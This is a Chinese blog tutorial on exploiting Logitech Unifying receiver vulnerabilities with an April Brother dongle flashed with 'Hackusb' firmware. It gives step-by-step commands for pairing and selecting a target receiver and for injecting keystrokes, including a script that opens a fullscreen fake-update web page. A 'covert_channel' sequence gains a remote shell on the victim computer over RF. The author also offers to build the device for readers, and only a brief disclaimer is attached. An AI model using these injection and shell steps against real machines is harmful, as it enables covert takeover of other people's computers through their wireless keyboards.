BADUSB | Hackusb | 罗技漏洞利用|制作教程

BADUSB | 罗技漏洞利用

提示:本文为原创文章转载本文章请标注来源与原作者,请尊重作者的劳动成果!

前言

近日,有研究人员表示发现了罗技的Unifying USB接收器存在4个新的安全漏洞。这个接收器可将六个不同的设备连接到同一个计算机。据悉,这些漏洞是由于罗技加密狗的过时固件造成的,攻击者可以依靠漏洞通过物理方式访问目标计算机,同时发动点击注入攻击,并记录鼠标点击记录最终实现控制操作系统。
目前,这四个漏洞均已上报给罗技公司,但对方表示只会修复其中两个,另外两个将继续保持“开放”状态:

CVE-2019-13054和CVE-2019-13055漏洞将在2019年8月发布的更新中修复,CVE-2019013052和CVE-2019-13053已经放弃治疗。
Hacksub用于通过RF枚举和测试Logitech无线输入设备的漏洞,设备通过串口来连接控制。

CVE-2019-13054和CVE-2019-13055这两个漏洞分别能够影响Logitech R500、Logitech SPOTLIGHT和所有具有键盘功能的加密Unifying设备。原本漏洞可使攻击者对计算机进行物理访问,经过修复后,将成为“通过转储来主动获取链路的加密密钥”。

mame82大佬利用CVE-2019-13055漏洞对罗技K360的键盘进行了攻击演示,仅通过一个键盘,就能够实现从所有配对设备中转储AES密钥和地址,随后便能够窃听和解密射频(RF)传输,并且这些操作都是即时的。

mame82大佬表示,在有密钥的情况下,攻击者可以注入任意内容、执行任意操作,以及远程窃听用户系统和实时解密键盘输入的内容,并且这对所有具有键盘功能的加密Unifying设备都适用。同时,执行注入的设备也很难被用户发现,因为地址是预先知道的,而实际设备并不在其应用范围内。


制作教程

提醒:本教程,只做漏洞演示与漏洞重现。仅供学习研究。一切违法与本作者无关!
本教程,需要有一定的shell操作基础。别总是DD我这是什么情况这怎么会这样!
不懂直接下面评论!你们评论在下面大家可以一起解决问题。站长我时间有限,急事联系Q614767697!

作者 fusss badusb.pw
二次编辑 bingli

需要的材料有

1.C-U0007罗技优联接收器
2.April Brother Dongle(四月兄弟加密狗)
罗技接收器一定要问清楚是不是cu0007的别整个08!

需要得软件有:

Putty
Another TermLite(安卓)
unifying

如果自己不想制作的。站长可代做,需要联系我

q614767697

首先将固件刷入发射器

  • 点击下载固件
    用卡针啊,很细很细之类的物体按发射器上有个小孔边按着边插入电脑,插入电脑后,这时候电脑就会加载一个新的盘符,这个就是发射器的bootloader内存空间,这时候就将我们之前下载好固件直接移至该盘符内,等待覆盖完成后,电脑上的新盘符会消失,在重新插入计算机内进行下一步。

小孔
小孔

在先将发射器与接收器插入电脑。

①需要软件unifying 打开后点击 高级

1.png
1.png

②在终端内输入 pair device run 并且运行!
2.png
2.png

③点击配对新设备
3.png
3.png

④这里就是你新配对的MAC地址
4.png
4.png

⑤这里查看你新添加的设备
5.png
5.png

一、配置发射器环境

1.1、插入发射器

将你的April USB Dongle(发射器)插入电脑,也就是这个东西。

April USB Dongle
April USB Dongle

1.2、安装

等待安装好驱动。

1.3、设备管理器

  • 右键我的电脑->管理->设备管理器,找到端口。
    设备管理器
    设备管理器
  • 右键USB 串行设备(COM3)->属性

1.4、配置端口

在弹出的新窗口选择第二个端口设置

端口配置
端口配置

二、配置PuTTY

2.1、下载

如果你还没PuTTY的话,请自行通过搜索引擎搜索并下载。

2.2、配置终端

  • Serial
    COM[3] 这里的数字取决于你在设备管理器中看到的端口号。

Serial
Serial

  • Keyborad
    Keyborad
    Keyborad
  • Session
    Session
    Session
  • Save
    保存一下刚刚配置好的那些,下次就可以双击这个直接打开。

Save
Save

  • Open
    等有字出现,发射器和PuTTY配置也就完成了。

三、使用

3.1、使用前提

你已经将你的发射器以及罗技存在漏洞的USB接收器插入电脑。

3.2、设备匹配

  • 输入devices storage load XX:XX:XX:XX:XX从flash载入到设备内(注意:此处MAC地址为load之前接收器的MAC地址,另外可以按TAB键自动补全代码,或者命令写到load时候按tab补全MAC地址,一般来说要么是第一个要么是最后一个,下面那个也是同样的道理,要先执行这步才可以用inject来选择注入!)。
  • 出现下面所示,说明就是加载成功了。
    discover
    discover
  • 输入inject target XX:XX:XX:XX:XX选择注入设备(注意:这里的MAC地址应该是跟上面MAC地址相同)。

3.3、简单代码应用

  • script编辑一段脚本。
    script
    script
  • 具体原理就是用win + r,然后输入iexplore -k http://fakeupdate.net/wnc/,再按下F11,就达到以假乱真的效果。
  • script press GUI r 先按win+r,打开cmd。
  • script delay 500 设置500毫秒的延迟。
  • script string iexplore -k http://fakeupdate.net/wnc/ 输入。
  • script delay 500 再延迟500毫秒。
  • script press enter 按下回车。
  • script show 在检测一下代码是否如我们写的那一般。
    script-show
    script-show
  • 确认无误后用 inject execute 执行代码。
    inject-execute
    inject-execute
  • 出现上图所示的内容呢,就说明你已经成功执行了。

3.4、更新固件

  • 点击下载固件
  • 首先更新固件之前你得先连接上PuTTY,输入erase_flash,目的是为了刷新一下flash,以确保更新后能正常使用。
  • 拔下发射器,然后用卡针啊,很细很细之类的物体按发射器上有个小孔,边按着边插入电脑,插入电脑后,这时候电脑就会加载一个新的盘符,这个就是发射器的bootloader内存空间,这时候就将我们之前下载好固件直接移至该盘符内,把更新文件拉进去后,会自动更新。
    小孔
    小孔
  • 更新完固件后,你就会发现最前面前缀变成了HackUSB。

四、一键进入电脑shell

4.1、covert_channel模块

  • covert_channel模块

4.2、运行脚本

  • covert_channel deploy XX:XX:XX:XX:XX 运行脚本(这里可能需要几分钟,如果不成功需要多执行几遍。或者关闭目标机的输入法)
  • 出现下图所示,就说明你成功注入了。
    成功注入
    成功注入
  • 输入covert_channel connnec XX:XX:XX:XX:XX进入控制,显示如下图所示就是成功进入电脑的shell了。
    shell
    shell
  • 如果需要退出,输入!exit

五、手机连接

请参考PDF文档。

六、命令介绍。

有待完善~。

七、键位

#define KEY_NULL 0x00 // null

#define KEY_A 0x04 // A 
#define KEY_B 0x05 // B 
#define KEY_C 0x06 // C 
#define KEY_D 0x07 // D 
#define KEY_E 0x08 // E
#define KEY_F 0x09 // F 
#define KEY_G 0x0A // G 
#define KEY_H 0x0B // H 
#define KEY_I 0x0C // I 
#define KEY_J 0x0D // J 
#define KEY_K 0x0E // K 
#define KEY_L 0x0F // L 
#define KEY_M 0x10 // M 
#define KEY_N 0x11 // N 
#define KEY_O 0x12 // O 
#define KEY_P 0x13 // P 
#define KEY_Q 0x14 // Q 
#define KEY_R 0x15 // R 
#define KEY_S 0x16 // S 
#define KEY_T 0x17 // T 
#define KEY_U 0x18 // U 
#define KEY_V 0x19 // V
#define KEY_W 0x1A // W 
#define KEY_X 0x1B // X 
#define KEY_Y 0x1C // Y 
#define KEY_Z 0x1D // Z
#define KEY_1 0x1E // 1 ! 
#define KEY_2 0x1F // 2 @ 
#define KEY_3 0x20 // 3 # 
#define KEY_4 0x21 // 4 $
#define KEY_5 0x22 // 5 %
#define KEY_6 0x23 // 6 ^
#define KEY_7 0x24 // 7 &
#define KEY_8 0x25 // 8 *
#define KEY_9 0x26 // 9 (
#define KEY_0 0x27 // 0 )

#define KEY_ENTER 0x28 // enter
#define KEY_ESC 0x29 // esc

#define KEY_BACKSPACE 0x2A // backspace
#define KEY_TAB 0x2B // tab
#define KEY_SPACE 0x2C // space

#define KEY_SUB 0x2D // - and _ 
#define KEY_EQUAL 0x2E // = and +
#define KEY_LEFT_BRACKET 0x2F // [ and { 
#define KEY_RIGHT_BRACKET 0x30 // ] and } 
#define KEY_VERTICAL_LINE 0x31 // \
#define KEY_WAVE 0x32 // ` and ~
#define KEY_SEMICOLON 0x33 // ; and : 
#define KEY_QUOTE 0x34 // ' and \
#define KEY_THROW 0x35 // ~ and ` 
#define KEY_COMMA 0x36 // , and < 
#define KEY_DOT 0x37 // . and >
#define KEY_QUESTION 0x38 // / and ? 
#define KEY_CAPS_LOCK 0x39 // caps Lock

#define KEY_F1 0x3A // f1
#define KEY_F2 0x3B // f2
#define KEY_F3 0x3C // f3
#define KEY_F4 0x3D // f4
#define KEY_F5 0x3E // f5
#define KEY_F6 0x3F // f6
#define KEY_F7 0x40 // f7
#define KEY_F8 0x41 // f8
#define KEY_F9 0x42 // f9
#define KEY_F10 0x43 // f10
#define KEY_F11 0x44 // f11
#define KEY_F12 0x45 // f12

#define KEY_PRT_SCR 0x46 // prtint screen
#define KEY_SCOLL_LOCK 0x47 // scoll Lock
#define KEY_PAUSE 0x48 // pause
#define KEY_INS 0x49 // insert
#define KEY_HOME 0x4A // home
#define KEY_PAGEUP 0x4B // pageup
#define KEY_DEL 0x4C // del
#define KEY_END 0x4D // end
#define KEY_PAGEDOWN 0x4E // pagedown

#define KEY_RIGHT_ARROW 0x4F // →
#define KEY_LEFT_ARROW 0x50 // ←
#define KEY_DOWN_ARROW 0x51 // ↓
#define KEY_UP_ARROW 0x52 // ↑

#define KEY_PAD_NUMLOCK 0x53

#define KEY_LCTRL 0xE0 // left ctrl 0x01 
#define KEY_LALT 0xE2 // left Alt 0x04 
#define KEY_LSHFIT 0xE1 // left Shift 0x02 
#define KEY_LWIN 0xE3 // left windows 0x08 
#define KEY_RWIN 0xE7 // right windows 0x80
#define KEY_RSHIFT 0xE5 // right Shift 0x20 

七、免责声明

1.Hackusb只用于测试与学习研究,只供在本机测试,在他人机子上测试而造成的损失我不负任何责任。
2.Hackusb仅为测试工具,不可违法使用。
使用Hackusb后默认同意以上。

*更多帮助:Hackusb 1.1 使用手册.pdf / 配对教程 / B站视频演示
提示:本文为原创 文章转载本文章请标注来源与原作者,请尊重作者的劳动成果!

添加新评论

已有 4 条评论

Another TermLite 网盘链接:https://pan.baidu.com/s/1v_ulDRFCmnHxqYRnJAjvHw 提取码:dev5省着翻墙了

手机连接的app Another TermLite谷歌应用市场也没这软件
请问哪里可以下载呢?

fusss fusss 回复 @圣火兽
0 0

谷歌商店是有的 你确定你进对了 谷歌商店??

大家有什么问题,就在这里说。
我有时间就会回复大家的。
这里评论的好处是同一个问题可以在评论区内看见解决。